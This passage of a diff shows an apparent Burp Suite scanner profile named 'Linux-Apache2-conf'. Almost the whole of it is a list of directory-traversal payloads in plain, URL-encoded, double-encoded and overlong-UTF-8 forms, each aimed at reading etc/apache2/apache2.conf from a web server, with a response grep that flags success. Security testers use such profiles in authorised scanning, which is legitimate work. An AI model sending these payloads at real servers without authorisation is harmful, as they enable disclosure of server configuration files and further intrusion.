c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,Apache server configuration"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-Apache2-conf","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-Apache2-conf: \u003cbr\u003e \u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/apache2/apache2.conf","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Linux-Apache2-conf",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@Sy3Omda",
+ "Payloads": [
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
